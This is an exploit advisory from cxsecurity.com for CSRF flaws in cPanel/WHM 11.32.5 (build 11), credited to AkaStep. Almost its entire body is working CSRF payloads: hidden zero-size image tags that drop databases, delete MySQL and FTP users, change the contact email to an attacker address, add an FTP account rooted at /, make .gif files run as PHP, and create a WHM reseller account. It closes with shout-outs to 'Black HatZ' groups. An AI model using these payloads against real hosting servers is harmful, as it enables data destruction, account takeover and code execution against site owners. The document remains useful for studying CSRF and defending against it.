cpanel 11.32.5 (build 11) 11.32.5.11 CSRF

2012.10.21
Credit: AkaStep
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

========== Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] Vulnerability: CSRF Vendor: cpanel.net ========== ===================================================================== Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] Aka: Cpanel Accelerated 2 via WHM 11.32.5 (build 11) ===================================================================== CSRF: Drop Database: (Method $_GET) <img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" /> Here we are going to drop database named: armenian_music ===================================================================== CSRF: Drop mysql user: (Method $_GET) <img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" /> Here we are going to drop mysql user named: armenian_adserver )) ===================================================================== CSRF: Change email address: (Contact Information & Preferences) (Method $_GET) Changing email address to: owned_and_owned_again@gmail.tld <img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" heigth="0" width="0" /> ===================================================================== CSRF adding FTP account: username: akastep password: akastep host is target host. <img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" heigth="0" width="0" /> ===================================================================== CSRF Drop FTP account: Deletes existent ftp account named: axaxa <img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" /> ===================================================================== CSRF change Apache handler: (Parse .gif file as php script) <img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" /> ===================================================================== CSRF Delete handler: <img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" /> ===================================================================== WHM 11.32.5 (build 11) CSRF: Add Reseller+setup with domain: owned.com username: owned111 password: MYVERYSTRONGGOESHERE And contact email: owned@owned1.you <img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default&quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" /> ================================================ SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS: ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com exploit-db.com osvdb.com websecurity.com.ua to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top